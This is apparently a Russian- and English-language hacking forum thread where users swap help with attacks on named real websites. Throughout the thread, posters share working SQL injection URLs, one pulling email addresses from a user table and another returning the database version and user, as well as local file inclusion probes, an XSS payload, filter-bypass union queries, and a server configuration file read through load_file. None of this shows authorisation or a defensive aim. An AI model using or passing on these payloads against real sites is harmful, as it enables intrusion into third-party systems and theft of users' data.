Ваши вопросы по уязвимостям.

а если мне пишет что

SELECT command denied to user 'блаблабла'@'localhost' for table 'user'

ет чё значит?

 

значит у данного юзера нет прав для доступа к таблице user.
Пользуйтесь переводчиком!

 

Подскажите, почему не выводит данные из таблицы?

PHP:

http://english.in.ua/contacts.php?id=8+or+1+group+by+concat%28%28select+email+from+acc_users+limit+12,1%29,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+#


 

Вот нашел уязвимость:

Code:

http://www.eash.eu/openletter2011/index.php?file=stylesheet.css

А дальше можно как-то развить ее?

 

Это не уязвимость

 

так сделай

 

Если вбить кавычку в пост-параметр, то вылазит ошибка вида

HTML:

Error query: UPDATE `userdata` SET `email`='[email protected]', `mobile`='', `hometel`='', `icq`=''', `website`='', `forumnick`='' WHERE (`uid`='50536')

конкретно это icq.Я так понимаю, что кроме того, что я вижу название таблицы,то больше ничего не добиться ?

 

в уязвимый параметр пиши select lol from troll и смотри результат выборки в анкете, или от чего это инфа. подзапрос же, ну ты понел..

 

Загрузил через load_file httpd.conf и не могу найти путь к сайту. Где он тут прописан?

Web Server: Apache/2.2.15 (Linux/SUSE)

Code:

# /etc/apache2/httpd.conf 
#
# This is the main Apache server configuration file.  It contains the
# configuration directives that give the server its instructions.
# See <URL:http://httpd.apache.org/docs-2.2/> for detailed information about
# the directives.

# Based upon the default apache configuration file that ships with apache,
# which is based upon the NCSA server configuration files originally by Rob
# McCool. This file was knocked together by Peter Poeml <[email protected]>.

# If possible, avoid changes to this file. It does mainly contain Include
# statements and global settings that can/should be overridden in the
# configuration of your virtual hosts.

# Quickstart guide:
# http://en.opensuse.org/Apache_Quickstart_HOWTO


# Overview of include files, chronologically:
#
# httpd.conf
#  | 
#  |-- uid.conf  . . . . . . . . . . . . . .  UserID/GroupID to run under
#  |-- server-tuning.conf  . . . . . . . . .  sizing of the server (how many processes to start, ...)
#  |-- sysconfig.d/loadmodule.conf . . . . .  [*] load these modules
#  |-- listen.conf . . . . . . . . . . . . .  IP adresses / ports to listen on
#  |-- mod_log_config.conf . . . . . . . . .  define logging formats
#  |-- sysconfig.d/global.conf . . . . . . .  [*] server-wide general settings
#  |-- mod_status.conf . . . . . . . . . . .  restrict access to mod_status (server monitoring)
#  |-- mod_info.conf . . . . . . . . . . . .  restrict access to mod_info
#  |-- mod_usertrack.conf  . . . . . . . . .  defaults for cookie-based user tracking
#  |-- mod_autoindex-defaults.conf . . . . .  defaults for displaying of server-generated directory listings
#  |-- mod_mime-defaults.conf  . . . . . . .  defaults for mod_mime configuration
#  |-- errors.conf . . . . . . . . . . . . .  customize error responses
#  |-- ssl-global.conf . . . . . . . . . . .  SSL conf that applies to default server _and all_ virtual hosts
#  |
#  |-- default-server.conf . . . . . . . . .  set up the default server that replies to non-virtual-host requests
#  |    |--mod_userdir.conf  . . . . . . . .  enable UserDir (if mod_userdir is loaded)
#  |    `--conf.d/apache2-manual?conf  . . .  add the docs ('?' = if installed)
#  |
#  |-- sysconfig.d/include.conf  . . . . . .  [*] your include files 
#  |                                             (for each file to be included here, put its name 
#  |                                              into APACHE_INCLUDE_* in /etc/sysconfig/apache2)
#  |
#  `--  . . . . . . . . . . . . . .  for each virtual host, place one file here
#       `-- *.conf . . . . . . . . . . . . .     (*.conf is automatically included)
#
#
# Files marked [*] are created from sysconfig upon server restart: instead of
# these files, you edit /etc/sysconfig/apache2



#  Filesystem layout:
#
# /etc/apache2/
#  |-- charset.conv  . . . . . . . . . . . .  for mod_auth_ldap
#  |-- conf.d/
#  |   |-- apache2-manual.conf . . . . . . .  conf that comes with apache2-doc
#  |   |-- mod_php4.conf . . . . . . . . . .  (example) conf that comes with apache2-mod_php4
#  |   `-- ... . . . . . . . . . . . . . . .  other configuration added by packages
#  |-- /etc/apache2/
#  |-- errors.conf
#  |-- httpd.conf  . . . . . . . . . . . . .  top level configuration file
#  |-- listen.conf
#  |-- magic
#  |-- mime.types -> ../mime.types
#  |-- mod_autoindex-defaults.conf
#  |-- mod_info.conf
#  |-- mod_log_config.conf
#  |-- mod_mime-defaults.conf
#  |-- mod_perl-startup.pl
#  |-- mod_status.conf
#  |-- mod_userdir.conf
#  |-- mod_usertrack.conf
#  |-- server-tuning.conf
#  |-- ssl-global.conf
#  |-- ssl.crl/  . . . . . . . . . . . . . .  PEM-encoded X.509 Certificate Revocation Lists (CRL)
#  |-- ssl.crt/  . . . . . . . . . . . . . .  PEM-encoded X.509 Certificates
#  |-- ssl.csr/  . . . . . . . . . . . . . .  PEM-encoded X.509 Certificate Signing Requests
#  |-- ssl.key/  . . . . . . . . . . . . . .  PEM-encoded RSA Private Keys
#  |-- ssl.prm/  . . . . . . . . . . . . . .  public DSA Parameter Files
#  |-- sysconfig.d/  . . . . . . . . . . . .  files that are created from /etc/sysconfig/apache2
#  |   |-- global.conf
#  |   |-- include.conf
#  |   `-- loadmodule.conf
#  |-- uid.conf
#  `-- vhosts.d/ . . . . . . . . . . . . . .  put your virtual host configuration (*.conf) here
#      |-- vhost-ssl.template
#      `-- vhost.template



### Global Environment ######################################################
#
# The directives in this section affect the overall operation of Apache,
# such as the number of concurrent requests.

# run under this user/group id
Include /etc/apache2/uid.conf

# - how many server processes to start (server pool regulation)
# - usage of KeepAlive
Include /etc/apache2/server-tuning.conf

# ErrorLog: The location of the error log file.
# If you do not specify an ErrorLog directive within a <VirtualHost>
# container, error messages relating to that virtual host will be
# logged here.  If you *do* define an error logfile for a <VirtualHost>
# container, that host's errors will be logged there and not here.
ErrorLog /var/log/apache2/error_log

# generated from APACHE_MODULES in /etc/sysconfig/apache2
Include /etc/apache2/sysconfig.d/loadmodule.conf

# IP addresses / ports to listen on
Include /etc/apache2/listen.conf

# predefined logging formats
Include /etc/apache2/mod_log_config.conf

# generated from global settings in /etc/sysconfig/apache2
Include /etc/apache2/sysconfig.d/global.conf

# optional mod_status, mod_info
Include /etc/apache2/mod_status.conf
Include /etc/apache2/mod_info.conf

# optional cookie-based user tracking
# read the documentation before using it!!
Include /etc/apache2/mod_usertrack.conf

# configuration of server-generated directory listings
Include /etc/apache2/mod_autoindex-defaults.conf

# associate MIME types with filename extensions
TypesConfig /etc/apache2/mime.types
DefaultType text/plain
Include /etc/apache2/mod_mime-defaults.conf

# set up (customizable) error responses
Include /etc/apache2/errors.conf

# global (server-wide) SSL configuration, that is not specific to 
# any virtual host
Include 

# forbid access to the entire filesystem by default
<Directory />
    Options Indexes
    AllowOverride None
    Order deny,allow
    Deny from all
</Directory>

# use .htaccess files for overriding,
AccessFileName .htaccess
# and never show them
<Files ~ "^\.ht">
    Order allow,deny
    Deny from all
</Files>

# List of resources to look for when the client requests a directory
DirectoryIndex index.html index.html.var

### 'Main' server configuration #############################################
#
# The directives in this section set up the values used by the 'main'
# server, which responds to any requests that aren't handled by a
# <VirtualHost> definition.  These values also provide defaults for
# any <VirtualHost> containers you may define later in the file.
#
# All of these directives may appear inside <VirtualHost> containers,
# in which case these default settings will be overridden for the
# virtual host being defined.
#
Include /etc/apache2/default-server.conf


# Another way to include your own files
#
# The file below is generated from /etc/sysconfig/apache2,
# include arbitrary files as named in APACHE_CONF_INCLUDE_FILES and
# APACHE_CONF_INCLUDE_DIRS
Include /etc/apache2/sysconfig.d/include.conf


### Virtual server configuration ############################################
#
# VirtualHost: If you want to maintain multiple domains/hostnames on your
# machine you can setup VirtualHost containers for them. Most configurations
# use only name-based virtual hosts so the server doesn't need to worry about
# IP addresses. This is indicated by the asterisks in the directives below.
#
# Please see the documentation at
# <URL:http://httpd.apache.org/docs-2.2/vhosts/>
# for further details before you try to setup virtual hosts.
#
# You may use the command line option '-S' to verify your virtual host
# configuration.
#
Include /etc/apache2/vhosts.d/*.conf


# Note: instead of adding your own configuration here, consider 
#       adding it in your own file (/etc/apache2/httpd.conf.local)
#       putting its name into APACHE_CONF_INCLUDE_FILES in 
#       /etc/sysconfig/apache2 -- this will make system updates 
#       easier :) 

 

Как-бы намекает.

 

LFI, но похоже, что из директории не выпускает.
http://www.eash.eu/phpmyadmin/print.css - файл есть
http://www.eash.eu/openletter2011/index.php?file=../phpmyadmin/print.css - файла нет

Можно почитать файлы, к которым нет доступа через сайт:
http://www.eash.eu/openletter2011/index.php?file=.htaccess

Использовать для XSS:
http://www.eash.eu/openletter2011/index.php?file=<img/src="a"onerror="alert(1)">

Или просто найти другой баг на сайте, как было написано выше =)

Code:

http://www.eash.eu/openletter2011/index.php?file=show.php&ref=-1+and+1=0+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10,11,12,13,14,15,16,17,18,19,20+--+

5.1.49-3:eash_live@localhost:eash_live
Кавычки не фильтруются и не экранируются

 

Code:

http://www.bandiklatprovbali.info/?modul=detil&id=-5+and+1=0+uni%0Bon+se%0Blect+1,2,3,4+--+

Can't get vuln number?

 

http://www.bandiklatprovbali.info/?modul=detil&id=5'and(false)union(select(1),2,3,4)--+

 

Is this site vulnerable?

Code:

http://www.zkm.com.cn/en/product_x.php?id=-1+and+1=0

Nothing yet works on it.

 

Thank you, I thought as much; Blind SQL Injection.

I'll have my take on it.

 

Подскажите: http://site.com/?con=news&tipe=http://google.com отображается на странице как "http://google.com", читалки тоже нет...

 

http://www.oz-gorod.ru/auto_ads.php?aid=3

вот есть скуля, чтобы не подставил суть ошибки не меняется, есть смысл подбирать количество полей?